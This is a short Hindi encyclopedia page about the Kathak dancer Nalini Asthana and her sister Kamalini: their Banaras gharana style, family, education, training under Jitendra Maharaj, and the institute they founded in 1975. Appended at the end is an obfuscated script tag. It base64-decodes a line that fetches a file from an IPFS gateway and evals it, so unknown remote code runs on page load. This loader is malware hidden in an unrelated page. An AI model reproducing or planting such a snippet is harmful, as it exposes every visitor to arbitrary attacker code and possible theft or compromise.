नलिनी अस्थाना

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें
नलिनी अस्थाना और कमलिनी अस्थाना

नलिनी अस्थाना (अंग्रेज़ी: Nalini Asthana) भारतीय शास्त्रीय नृत्य कत्थक की प्रसिद्ध नृत्यांगना हैं। वह बनारस घराने से सम्बंधित हैं।

  • कमलिनी अस्थाना और नलिनी अस्थाना उत्तर प्रदेश के आगरा से जुड़ी नृत्यांगना बहनें हैं। वह कत्थक की बनारस घराना शैली के अपने शानदार प्रदर्शन के लिए जानी जाती हैं। उन्हें भारत और विदेशों में कथक की बनारस घराना शैली को लोकप्रिय बनाने में उनके योगदान के लिए भी जाना जाता है।
  • इनके पिता बी. पी. अस्थाना, रॉयल एयर फ़ोर्स की सेवा में थे। माँ श्यामा कुमारी अस्थाना एक हिंदुस्तानी गायिका थीं।
  • हालाँकि वे आगरा में पैदा हुए थे, लेकिन उनका पालन-पोषण दिल्ली में हुआ।
  • शिक्षा मैसूर सरकार द्वारा संचालित दिल्ली कन्नड़ स्कूल और वेंकटेश्वर कॉलेज में हुई।
  • बनारस घराने के गुरु जितेंद्र महाराज के साथ एक मुलाकात के बाद कमलिनी और नलिनी को नृत्य और विशेष रूप से कथक की दुनिया से लगाव हो गया।
  • नलिनी और कमलिनी ने सन 1973 में कथक सीखना शुरू किया और दोनों का पहला प्रदर्शन कोच्चि, केरल में हुआ, जब वे अपने गुरु के साथ यात्रा कर रही थीं।
  • इन बहनों की जोड़ी ने सन 1975 में दिल्ली में संगीतका इंस्टीट्यूट ऑफ परफॉर्मिंग आर्ट्स की स्थापना की, जो कथक और शास्त्रीय संगीत का प्रशिक्षण देने वाला एक संस्थान है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

बाहरी कड़ियाँ

संबंधित लेख

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>